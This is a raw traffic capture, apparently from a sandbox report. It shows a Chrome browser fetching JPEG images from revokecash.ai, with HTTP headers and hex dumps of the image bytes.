                                                                          2023-12-10 16:44:30 UTC1369INData Raw: ec 7e f8 72 1e 97 84 b6 a2 58 9b c4 ce f1 90 85 b5 cd 2a e1 74 3d a0 c6 9d b0 a1 09 59 31 47 88 f0 b6 e8 d1 5d f7 c8 8b 3d 38 52 37 07 ac e8 db d0 f0 83 ee 42 59 72 78 83 f1 5d d1 69 07 42 82 e8 67 f0 c1 77 25 a4 5c 9c 25 1b ac 7a c8 66 58 5b 44 cf 6d db 65 f5 53 1c 8e 54 5b c6 d1 fa 5a 22 2c 96 59 82 98 99 ed bb 95 dc 8c 17 73 59 33 b8 11 c7 ce 5f 1b 9b dd 8e 8e d0 1f bf 18 97 a6 50 93 3b 18 16 f5 99 de 12 0c b6 bd 8d 37 61 46 0f 64 c6 15 87 85 b6 c6 98 5f 7c 88 b3 d4 cf a9 c3 21 8a 12 70 6b 21 18 b4 22 79 1c 28 6b 15 dd 16 7f a1 41 74 33 f8 60 bb 92 d2 3e 46 3b b7 22 e2 f1 31 5e 31 15 25 85 ed 6b 2a d2 6c 9e ad 6a bd 6d 55 dc 8c 17 73 5a 45 f1 fe 21 cb 33 a2 fb 00 a5 3d 12 84 9a 4c 68 5b d4 ce f0 94 62 f3 98 a2 c4 68 5b 6b 57 1b ef 95 f3 fa 1a 3e 4f e2
                                                                          Data Ascii: ~rX*t=Y1G]=8R7BYrx]iBgw%\%zfX[DmeST[Z",YsY3_P;7aFd_|!pk!"y(kAt3`>F;"1^1%k*ljmUsZE!3=Lh[bh[kW>O
                                                                          2023-12-10 16:44:30 UTC1369INData Raw: 3f 6c fc f6 7d 92 eb 34 63 a7 da dd bc cb 26 8b 4b 29 98 66 ae 8c 31 3a 3a 4f ad b5 ee 2d 1c db 32 ce 4f 56 62 99 8a 5f 25 b8 f5 54 5f 66 a6 41 d2 2d 69 67 f2 31 be d5 5c c2 56 ec c3 aa 8a 3c 42 3c c1 47 91 12 e0 47 95 85 1e 61 4b 6d 4c c3 a2 a5 1c 72 5a df 60 a1 fc 44 14 53 f6 91 7a 95 23 15 e2 c9 d1 8d e7 7d b6 25 57 6c d8 74 70 8e 3a 9f 61 42 bc 14 53 f6 90 4f 94 fa 58 5e 2a f3 96 48 5d 35 a5 07 ae 5a 05 64 ff 00 c1 9f 9f b3 ec 97 5a 1d 25 3e df dc ba c9 a2 cf 29 a3 a3 a6 fa db 5e e3 0c 73 6c f8 9e ac c5 23 14 be 48 f5 ae b5 44 2a ad ab 31 c6 5a 49 59 8a 2b 44 4e a6 dd 10 51 e2 11 e6 0a 3c 88 97 02 3c ac 28 f3 14 39 10 56 52 d7 1b 0b d6 a7 35 e2 c2 9f cc 2a e2 db a1 62 37 d6 c4 f9 4f a5 85 1e 2c 23 c0 ad c8 cf 70 59 e7 0f b1 75 9a 31 d3 ed ee de 65 93
                                                                          Data Ascii: ?l}4c&K)f1::O-2OVb_%T_fA-ig1\V<B<GGaKmLrZ`DSz#}%Wltp:aBSOX^*H]5ZdZ%>)^sl#HD*1ZIY+DNQ<<(9VR5*b7O,#pYu1e
                                                                          2023-12-10 16:44:30 UTC1369INData Raw: cc 45 06 d7 c2 16 da 9e 81 f4 22 6f d8 93 c2 54 d1 f5 f0 06 bf 14 3d c2 69 56 2a ba 79 8f 48 d4 b7 55 03 0a 4a 21 10 91 ca 03 0e 73 a0 c3 58 5b 50 24 44 a9 9b b8 a7 b1 85 0d 4a 86 a4 4a 33 d4 a1 b0 a7 8f 79 26 0f 8c 29 74 54 c8 c3 08 39 ae 85 a2 0a 3b 8e 23 a1 de 32 15 8f c0 5e 23 85 96 a6 59 a2 6a 81 7e db 89 ce 52 f7 aa 1e 69 31 6c 0b e8 1f 47 38 41 ed 88 e2 65 32 98 c4 21 86 65 d6 de 04 db 26 d0 d5 53 42 79 27 1d 42 06 35 11 76 c6 5f 0e 4c d1 ca 03 0e 73 a0 d5 b3 16 09 90 bc d6 ad 52 3c 1b 53 c9 8b 62 32 89 f2 3f 63 90 d3 cd 64 25 ea 60 08 73 12 4b 16 21 4c 94 ec d1 dd 32 2d 10 71 dc 71 07 78 c8 56 3f 02 d9 d9 70 a6 88 e5 ac cf 48 a0 3f 73 ea 29 9b 42 4b 0b 95 51 a8 67 8a 5b 48 b3 4e a8 92 12 d0 67 b4 90 2e 04 e0 28 49 58 86 d5 0e 36 23 19 50 0d 22 16
                                                                          Data Ascii: E"oT=iV*yHUJ!sX[P$DJJ3y&)tT9;#2^#Yj~Ri1lG8Ae2!e&SBy'B5v_LsR<Sb2?cd%`sK!L2-qqxV?pH?s)BKQg[HNg.(IX6#P"
                                                                          2023-12-10 16:44:30 UTC1369INData Raw: c8 ef d4 e9 22 ee b8 91 12 93 99 af d0 39 2c 49 77 68 3d 73 eb 33 34 a8 cf 0d cc a7 d0 49 e1 a8 4d da 6c 65 1e b8 f4 93 49 dc 31 df 20 7e 59 fa 7b 2f 04 92 ff 00 a8 56 c8 5c 3e 2e b1 10 11 29 1d a7 ce 25 72 16 57 ed 05 2f 5a 1a 13 65 5d 60 60 09 7a 47 47 3a 4a c4 6a 31 c2 55 31 92 46 4c 04 c0 78 d4 4d a8 e3 7a e0 fc bd 21 ee 19 07 08 c7 00 58 51 74 e5 7b 91 10 29 46 a2 6a 4a 89 71 b7 4d 07 bc d9 71 1d 55 ac af 75 83 f9 d7 6c 05 b1 12 fa 65 00 d0 bb 61 3f de c1 7c 0c 66 db d2 88 b4 5b 34 3d b2 1b 16 59 ba 57 e6 ca 9e 84 3b 53 7f b6 49 2f 95 6f 32 06 07 2b a1 eb 2f c8 74 b2 7a d0 46 bc 86 2d f5 cc 3e 01 56 bf 93 fd 35 90 99 6d 95 a5 f6 4f 2d 60 e4 23 26 8f ac 0f 77 6a 96 bc de 19 89 80 c2 5f 24 58 57 aa 4b 41 6c 1d 06 f6 98 6b 9a eb 3f de c2 f1 74 b8 b5 ad
                                                                          Data Ascii: "9,Iwh=s34IMleI1 ~Y{/V\>.)%rW/Ze]``zGG:Jj1U1FLxMz!XQt{)FjJqMqUulea?|f[4=YW;SI/o2+/tzF->V5mO-`#&wj_$XWKAlk?t
                                                                          2023-12-10 16:44:30 UTC125INData Raw: 81 d4 67 d0 ee c2 17 ca b9 3a 74 95 11 2e bf cb ac ff 00 c6 55 2a 7f c2 d4 ff 00 8c a9 52 54 f0 a9 52 a5 4a 95 2a 54 a9 52 a7 ea a9 f5 6a 95 2a 78 54 a9 15 2a 54 a9 52 a5 4a 95 2a 54 8a 95 2a 78 d4 a9 f5 6a 95 2a 54 a9 fb d5 25 44 95 3c 2a 7d 3e a5 4f 0a 95 2a 54 a9 fc 1a 95 2a 54 4c c4 95 2a 7d 34 2e 54 f0 08 12 a4 a9 50 25 4f de a9 52 54 a9 12 54 67 85 4f e2 ff 00 ff d9
                                                                          Data Ascii: g:t.U*RTRJ*TRj*xT*TRJ*T*xj*T%D<*}>O*T*TL*}4.TP%ORTTgO


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          60192.168.2.549785104.21.1.2284435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:30 UTC587OUTGET /_img/premint.jpg HTTP/1.1
                                                                          Host: revokecash.ai
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: image
                                                                          Referer: https://revokecash.ai/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:44:30 UTC712INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 33 30 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 69 6d 61 67 65 2f 6a 70 65 67 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 36 36 36 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 58 2d 50 6f 77 65 72 65 64 2d 42 79 3a 20 45 78 70 72 65 73 73 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 20 6d 61 78 2d 61 67 65 3d 31 34 34 30 30 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 30 3a 30 37 3a 33 38 20 47 4d 54 0d 0a 45 54 61 67 3a 20 57 2f 22 34 31 31 35 2d 31 38 63 35 33 33 32 35 62 62 30 22
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:44:30 GMTContent-Type: image/jpegContent-Length: 16661Connection: closeX-Powered-By: ExpressCache-Control: public, max-age=14400Last-Modified: Sun, 10 Dec 2023 10:07:38 GMTETag: W/"4115-18c53325bb0"
                                                                          2023-12-10 16:44:30 UTC657INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 48 00 48 00 00 ff e2 0c 58 49 43 43 5f 50 52 4f 46 49 4c 45 00 01 01 00 00 0c 48 4c 69 6e 6f 02 10 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 ce 00 02 00 09 00 06 00 31 00 00 61 63 73 70 4d 53 46 54 00 00 00 00 49 45 43 20 73 52 47 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f6 d6 00 01 00 00 00 00 d3 2d 48 50 20 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 11 63 70 72 74 00 00 01 50 00 00 00 33 64 65 73 63 00 00 01 84 00 00 00 6c 77 74 70 74 00 00 01 f0 00 00 00 14 62 6b 70 74 00 00 02 04 00 00 00 14 72 58 59 5a 00 00 02 18 00 00 00 14 67 58 59 5a 00 00 02 2c 00 00 00 14 62 58 59 5a 00 00 02 40 00 00 00 14 64
                                                                          Data Ascii: JFIFHHXICC_PROFILEHLinomntrRGB XYZ 1acspMSFTIEC sRGB-HP cprtP3desclwtptbkptrXYZgXYZ,bXYZ@d
                                                                          2023-12-10 16:44:30 UTC1369INData Raw: 77 77 77 2e 69 65 63 2e 63 68 00 00 00 00 00 00 00 00 00 00 00 16 49 45 43 20 68 74 74 70 3a 2f 2f 77 77 77 2e 69 65 63 2e 63 68 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 64 65 73 63 00 00 00 00 00 00 00 2e 49 45 43 20 36 31 39 36 36 2d 32 2e 31 20 44 65 66 61 75 6c 74 20 52 47 42 20 63 6f 6c 6f 75 72 20 73 70 61 63 65 20 2d 20 73 52 47 42 00 00 00 00 00 00 00 00 00 00 00 2e 49 45 43 20 36 31 39 36 36 2d 32 2e 31 20 44 65 66 61 75 6c 74 20 52 47 42 20 63 6f 6c 6f 75 72 20 73 70 61 63 65 20 2d 20 73 52 47 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 64 65 73 63 00 00 00 00 00 00 00 2c 52 65 66 65 72 65 6e 63 65 20 56 69 65 77 69 6e 67 20
                                                                          Data Ascii: www.iec.chIEC http://www.iec.chdesc.IEC 61966-2.1 Default RGB colour space - sRGB.IEC 61966-2.1 Default RGB colour space - sRGBdesc,Reference Viewing
                                                                          2023-12-10 16:44:30 UTC1369INData Raw: 28 d4 29 06 29 38 29 6b 29 9d 29 d0 2a 02 2a 35 2a 68 2a 9b 2a cf 2b 02 2b 36 2b 69 2b 9d 2b d1 2c 05 2c 39 2c 6e 2c a2 2c d7 2d 0c 2d 41 2d 76 2d ab 2d e1 2e 16 2e 4c 2e 82 2e b7 2e ee 2f 24 2f 5a 2f 91 2f c7 2f fe 30 35 30 6c 30 a4 30 db 31 12 31 4a 31 82 31 ba 31 f2 32 2a 32 63 32 9b 32 d4 33 0d 33 46 33 7f 33 b8 33 f1 34 2b 34 65 34 9e 34 d8 35 13 35 4d 35 87 35 c2 35 fd 36 37 36 72 36 ae 36 e9 37 24 37 60 37 9c 37 d7 38 14 38 50 38 8c 38 c8 39 05 39 42 39 7f 39 bc 39 f9 3a 36 3a 74 3a b2 3a ef 3b 2d 3b 6b 3b aa 3b e8 3c 27 3c 65 3c a4 3c e3 3d 22 3d 61 3d a1 3d e0 3e 20 3e 60 3e a0 3e e0 3f 21 3f 61 3f a2 3f e2 40 23 40 64 40 a6 40 e7 41 29 41 6a 41 ac 41 ee 42 30 42 72 42 b5 42 f7 43 3a 43 7d 43 c0 44 03 44 47 44 8a 44 ce 45 12 45 55 45 9a 45 de 46
                                                                          Data Ascii: ())8)k))**5*h**++6+i++,,9,n,,--A-v--..L.../$/Z///050l0011J1112*2c2233F3334+4e4455M555676r667$7`7788P8899B999:6:t::;-;k;;<'<e<<="=a==> >`>>?!?a??@#@d@@A)AjAAB0BrBBC:C}CDDGDDEEUEEF
                                                                          2023-12-10 16:44:30 UTC1369INData Raw: 03 01 00 02 10 03 10 00 00 00 d3 f1 b7 38 00 00 00 00 00 02 b4 ab 28 10 01 7d 99 31 b4 09 b2 63 ca e7 10 54 c9 8f 23 56 db 75 a0 09 c8 8f 26 35 48 4d 24 47 91 51 1c 4d a9 5a 32 54 69 31 9c 02 b9 31 65 45 73 51 34 91 1e 45 44 71 36 0c cd 87 36 17 21 35 7d 2a 73 60 54 be cb da b0 26 01 5a 56 8d 02 60 00 00 00 00 00 00 00 00 c5 d6 dc 2b 40 c0 32 63 c9 8c 40 9b 2e 3c 95 38 82 a6 5c 59 45 65 b7 d8 00 39 31 a5 45 70 0a d2 63 49 71 18 2b 52 eb 42 5c 59 71 1c 02 b9 51 25 c4 73 50 a9 26 34 97 11 82 b0 0c f8 24 47 72 0a af 04 d8 0a 64 c7 90 58 c0 c1 17 5b 75 ad 02 60 00 00 00 00 00 00 00 0a d0 ca df 8e f1 52 b6 02 fa e3 04 8c 75 c4 d6 56 22 79 b2 c4 cd 52 ae 04 bc f9 61 e6 6b 25 b8 ac 09 15 8c 1f 23 1e b1 5c 49 46 2b 95 23 8d 94 e0 8a 55 2a 91 a8 3e 5a 26 58 0f 39
                                                                          Data Ascii: 8(}1cT#Vu&5HM$GQMZ2Ti11eEsQ4EDq66!5}*s`T&ZV`+@2c@.<8\YEe91EpcIq+RB\YqQ%sP&4$GrdX[u`RuV"yRak%#\IF+#U*>Z&X9
                                                                          2023-12-10 16:44:30 UTC1369INData Raw: 8a c3 71 ec 53 c9 8c 11 7d a9 d1 d2 23 d4 65 d9 5d 6a 95 51 eb e6 83 74 57 19 1b 45 cf 82 46 98 c7 13 40 19 71 65 c4 d0 26 ba db 9a b4 26 00 00 00 01 55 0c bb 26 1b c5 d9 3d 8d ad ae df 23 60 f1 74 0c fd f8 fb 66 3f 4f 55 57 70 70 3d 7a cf 69 f8 11 f8 bd 89 15 8c 55 26 4f 1b 26 a2 b5 88 9b 97 9f 8d ce e6 4d 91 b1 84 da c1 27 cd c3 40 bc a7 a0 23 4e 42 77 03 c8 de 47 1c 9d 79 1a 71 f4 17 d1 71 f7 f1 77 9f 22 e3 91 af 3f c7 df c6 56 5c 82 02 35 9f 33 84 9f 79 d2 90 91 ac da 43 07 2d 11 12 a2 5d 22 a7 49 f6 c7 a5 46 54 64 dc 8c f0 25 39 b2 98 4a b3 30 82 56 26 21 64 a5 85 57 dd 8a f6 a9 4a 15 02 00 00 00 00 17 d9 7b 56 04 d3 21 c9 a9 8b 5a 56 68 02 44 79 11 ea 42 69 26 34 9b 88 c2 2d 22 3c 8a 9c 78 f2 63 4c 13 9f 02 7c 0b cc 23 47 23 c7 72 3a 65 c7 0c f5 52
                                                                          Data Ascii: qS}#e]jQtWEF@qe&&U&=#`tf?OUWpp=ziU&O&M'@#NBwGyqqw"?V\53yC-]"IFTd%9J0V&!dWJ{V!ZVhDyBi&4-"<xcL|#G#r:eR
                                                                          2023-12-10 16:44:30 UTC1369INData Raw: 4d c1 93 70 2e 22 ce 3b 24 32 2e 82 a7 ba 3d b5 d1 66 6c c2 66 3f ba ed b4 b2 ed b2 f2 9d 6c e9 ae 83 a7 ba 32 2e 88 91 1c 4b e9 33 28 6e 60 43 26 e0 c9 b8 32 8e 04 c6 5e 59 64 32 8e 0c a3 83 2a b1 95 58 7a 3a cc 9a 19 65 8c b2 c6 5d 61 b6 16 4b 48 5b 0b df 50 e0 28 70 54 38 2a 08 69 58 2c 70 94 38 4a 1c 33 1c 35 03 41 ee 90 dc 31 ba 63 74 c6 00 cb f5 fc c7 cc 30 cb 8e ba 86 d1 43 a2 b3 4f 8e 48 4a 1a 0d b4 1b 68 36 d0 9b 4a 8d 36 2b 91 df b4 74 37 e9 35 27 63 38 5d 93 f5 bb 9b b9 72 d5 bd 31 09 fb 6c 7c 2f 66 e7 cf 74 2b 66 e9 24 5f a5 62 e1 6d 74 46 d4 b6 25 44 91 19 e5 b4 f3 1d e6 c5 1b 67 f7 aa 34 b8 93 4b ed b1 f1 f6 d9 20 4b d9 c6 a6 96 ff 00 62 d1 dd bd a6 b3 ed 3e b9 66 58 19 91 8b 07 73 8e da 5a 31 ce 4f db 63 e1 5b 38 3e 6d 21 03 ed b2 40 fb 6c
                                                                          Data Ascii: Mp.";$2.=flf?l2.K3(n`C&2^Yd2*Xz:e]aKH[P(pT8*iX,p8J35A1ct0COHJh6J6+t75'c8]r1l|/ft+f$_bmtF%Dg4K Kb>fXsZ1Oc[8>m!@l
                                                                          2023-12-10 16:44:30 UTC1369INData Raw: 46 d0 3b 9f 57 37 bd fb 01 be 0e 0e 0f d9 1f b2 3f 68 7e d0 3e 1e e2 47 ed 8f e8 1f d0 3f a4 2b 0c 47 e8 3f 4f c8 ae 66 08 58 1b 7c c9 21 10 6a 17 83 68 ca 93 46 34 b4 c7 ea e1 02 e4 2e da d0 9e e3 94 e7 2d 55 b3 62 9e da 99 65 d7 56 e3 8a 5a cb b0 af 5d 9b fe 5d 67 d2 db df 4f d3 95 d7 e9 e6 ee d2 6e 9f e8 dd a1 bf 1b 5d 52 69 c6 9a 75 d5 b8 b5 2d 71 fb ed 8b 15 e2 94 51 6b aa 72 29 b6 76 a7 35 8a 1d fe d7 8e ad 19 15 06 d6 95 a5 2a 4d f4 58 f3 aa d0 17 31 85 16 07 87 a5 c1 f8 62 81 8a f1 11 48 58 c4 63 e9 73 9e 75 47 1f c1 0b f8 c3 eb 77 c8 ee fa d0 7b c5 94 a7 4c 55 ad ad 26 91 67 ea 13 d5 71 0a 52 ad c2 0d 5f c0 be 3f 3a ac 0d 9d fc b6 57 a6 d0 5e 4e 43 66 ff 00 f3 f5 0f 4b e5 32 ff 00 c8 15 7c 6e e2 be 75 9b 2b 4d 96 b9 f4 84 3f 53 a6 4d 2f e0 5f 8f
                                                                          Data Ascii: F;W7?h~>G?+G?OfX|!jhF4.-UbeVZ]]gOn]Riu-qQkr)v5*MX1bHXcsuGw{LU&gqR_?:W^NCfK2|nu+M?SM/_
                                                                          2023-12-10 16:44:30 UTC1369INData Raw: c8 72 4d c5 e1 92 94 32 32 c6 46 58 8d 0e 51 35 24 8f 21 30 64 26 0f 6f 98 3d be 68 7a 0c b3 89 1c 8b db a6 8f 6e 9c 3d b6 70 3a 6c ec 0c 55 20 4c 5c d7 4d 3e db 38 7b 74 e1 ed d3 45 3a 0c b4 ca 41 a8 a9 d3 70 21 ed f3 07 b7 cc 19 09 81 10 e5 14 27 08 64 65 8c 8c b1 92 94 32 52 84 88 92 0d 2c e1 93 92 32 92 46 52 40 6a 33 e4 ea 0c dc 8b 20 dc 5e 19 29 40 a0 4b 05 4d 9a 66 28 56 29 c7 a1 3c b5 d4 a8 73 23 c8 52 08 e0 4b 2e 67 12 49 03 8e f1 05 34 e7 0d 24 38 6b 1c 35 8d c5 8d c5 05 a4 f1 1b a6 30 3f c8 be a3 f4 c4 c6 26 1a 33 de 18 98 c4 c6 26 37 8c 11 9f 01 43 79 43 13 1b ca 1b ca 0f a9 58 34 37 94 37 94 37 94 23 29 59 86 83 ab 57 11 63 7d 43 7d 43 7d 62 2a d5 c2 94 37 d6 37 d6 37 d6 37 d6 1e 5a f2 51 87 11 63 88 b1 c4 58 37 17 81 8a b2 d7 9e 78 71 16 38
                                                                          Data Ascii: rM22FXQ5$!0d&o=hzn=p:lU L\M>8{tE:Ap!'de2R,2FR@j3 ^)@KMf(V)<s#RK.gI4$8k50?&3&7CyCX4777#)YWc}C}C}b*7777ZQcX7xq8
                                                                          2023-12-10 16:44:30 UTC1369INData Raw: 1a 07 f4 a7 a3 fb d7 2d 40 ef c6 cc e1 c1 e9 b6 7b 60 1d 10 be 8f a7 fb 5f 4e 2a 27 c7 23 0d 1c c7 b4 b5 cd 38 10 68 41 5b 6d e2 b9 6a 38 c5 a6 06 4c 18 6c c5 c5 be 50 67 52 b9 e2 b4 aa e5 d8 bf 2a 7e 35 cb b1 7e 54 fc 6b 95 6c 8f 76 0e 89 ec 1b f3 9c ac 84 c2 58 00 9e 23 e5 23 ad 41 d2 45 0b 7d 60 04 32 72 a3 2c e0 4c f8 f3 0c 05 e7 cd e9 ae 70 5c bb 17 e5 4f c6 b9 76 3f 34 b8 ff 00 4c 74 e7 7f 7a e5 d8 bf 2a 7e 35 cb b1 7e 54 fc 6a d0 27 31 b5 87 ca 06 66 03 9e 2b aa a7 52 b4 08 1d 68 79 68 90 b7 38 36 8d 2e ad 2a 2b cd 5c bd 18 69 d4 df 93 13 fe 6b 96 e2 7b 9a c2 43 7e 4c 45 48 1a 05 73 f4 55 68 3d 23 03 87 a9 0a 9e 81 89 c3 d6 b9 6a 26 b8 c7 57 33 e4 c4 d0 b9 ba ab 9f d1 55 cb b1 7e 54 fc 6a 71 31 81 e1 be 50 37 30 3a ad 0e d5 53 4e 72 b5 b6 cc 59 67
                                                                          Data Ascii: -@{`_N*'#8hA[mj8LlPgR*~5~TklvX##AE}`2r,Lp\Ov?4Ltz*~5~Tj'1f+Rhyh86.*+\ik{C~LEHsUh=#j&W3U~Tjq1P70:SNrYg


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          61192.168.2.549787104.21.1.2284435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:30 UTC586OUTGET /_img/layer3.jpg HTTP/1.1
                                                                          Host: revokecash.ai
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: image
                                                                          Referer: https://revokecash.ai/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:44:30 UTC712INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 33 30 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 69 6d 61 67 65 2f 6a 70 65 67 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 39 31 38 34 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 58 2d 50 6f 77 65 72 65 64 2d 42 79 3a 20 45 78 70 72 65 73 73 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 20 6d 61 78 2d 61 67 65 3d 31 34 34 30 30 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 30 3a 30 37 3a 33 35 20 47 4d 54 0d 0a 45 54 61 67 3a 20 57 2f 22 34 61 66 30 2d 31 38 63 35 33 33 32 35 30 30 34 22
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:44:30 GMTContent-Type: image/jpegContent-Length: 19184Connection: closeX-Powered-By: ExpressCache-Control: public, max-age=14400Last-Modified: Sun, 10 Dec 2023 10:07:35 GMTETag: W/"4af0-18c53325004"
                                                                          2023-12-10 16:44:30 UTC657INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 48 00 48 00 00 ff e2 0c 58 49 43 43 5f 50 52 4f 46 49 4c 45 00 01 01 00 00 0c 48 4c 69 6e 6f 02 10 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 ce 00 02 00 09 00 06 00 31 00 00 61 63 73 70 4d 53 46 54 00 00 00 00 49 45 43 20 73 52 47 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f6 d6 00 01 00 00 00 00 d3 2d 48 50 20 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 11 63 70 72 74 00 00 01 50 00 00 00 33 64 65 73 63 00 00 01 84 00 00 00 6c 77 74 70 74 00 00 01 f0 00 00 00 14 62 6b 70 74 00 00 02 04 00 00 00 14 72 58 59 5a 00 00 02 18 00 00 00 14 67 58 59 5a 00 00 02 2c 00 00 00 14 62 58 59 5a 00 00 02 40 00 00 00 14 64
                                                                          Data Ascii: JFIFHHXICC_PROFILEHLinomntrRGB XYZ 1acspMSFTIEC sRGB-HP cprtP3desclwtptbkptrXYZgXYZ,bXYZ@d
                                                                          2023-12-10 16:44:30 UTC1369INData Raw: 77 77 77 2e 69 65 63 2e 63 68 00 00 00 00 00 00 00 00 00 00 00 16 49 45 43 20 68 74 74 70 3a 2f 2f 77 77 77 2e 69 65 63 2e 63 68 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 64 65 73 63 00 00 00 00 00 00 00 2e 49 45 43 20 36 31 39 36 36 2d 32 2e 31 20 44 65 66 61 75 6c 74 20 52 47 42 20 63 6f 6c 6f 75 72 20 73 70 61 63 65 20 2d 20 73 52 47 42 00 00 00 00 00 00 00 00 00 00 00 2e 49 45 43 20 36 31 39 36 36 2d 32 2e 31 20 44 65 66 61 75 6c 74 20 52 47 42 20 63 6f 6c 6f 75 72 20 73 70 61 63 65 20 2d 20 73 52 47 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 64 65 73 63 00 00 00 00 00 00 00 2c 52 65 66 65 72 65 6e 63 65 20 56 69 65 77 69 6e 67 20
                                                                          Data Ascii: www.iec.chIEC http://www.iec.chdesc.IEC 61966-2.1 Default RGB colour space - sRGB.IEC 61966-2.1 Default RGB colour space - sRGBdesc,Reference Viewing
                                                                          2023-12-10 16:44:30 UTC1369INData Raw: 28 d4 29 06 29 38 29 6b 29 9d 29 d0 2a 02 2a 35 2a 68 2a 9b 2a cf 2b 02 2b 36 2b 69 2b 9d 2b d1 2c 05 2c 39 2c 6e 2c a2 2c d7 2d 0c 2d 41 2d 76 2d ab 2d e1 2e 16 2e 4c 2e 82 2e b7 2e ee 2f 24 2f 5a 2f 91 2f c7 2f fe 30 35 30 6c 30 a4 30 db 31 12 31 4a 31 82 31 ba 31 f2 32 2a 32 63 32 9b 32 d4 33 0d 33 46 33 7f 33 b8 33 f1 34 2b 34 65 34 9e 34 d8 35 13 35 4d 35 87 35 c2 35 fd 36 37 36 72 36 ae 36 e9 37 24 37 60 37 9c 37 d7 38 14 38 50 38 8c 38 c8 39 05 39 42 39 7f 39 bc 39 f9 3a 36 3a 74 3a b2 3a ef 3b 2d 3b 6b 3b aa 3b e8 3c 27 3c 65 3c a4 3c e3 3d 22 3d 61 3d a1 3d e0 3e 20 3e 60 3e a0 3e e0 3f 21 3f 61 3f a2 3f e2 40 23 40 64 40 a6 40 e7 41 29 41 6a 41 ac 41 ee 42 30 42 72 42 b5 42 f7 43 3a 43 7d 43 c0 44 03 44 47 44 8a 44 ce 45 12 45 55 45 9a 45 de 46
                                                                          Data Ascii: ())8)k))**5*h**++6+i++,,9,n,,--A-v--..L.../$/Z///050l0011J1112*2c2233F3334+4e4455M555676r667$7`7788P8899B999:6:t::;-;k;;<'<e<<="=a==> >`>>?!?a??@#@d@@A)AjAAB0BrBBC:C}CDDGDDEEUEEF
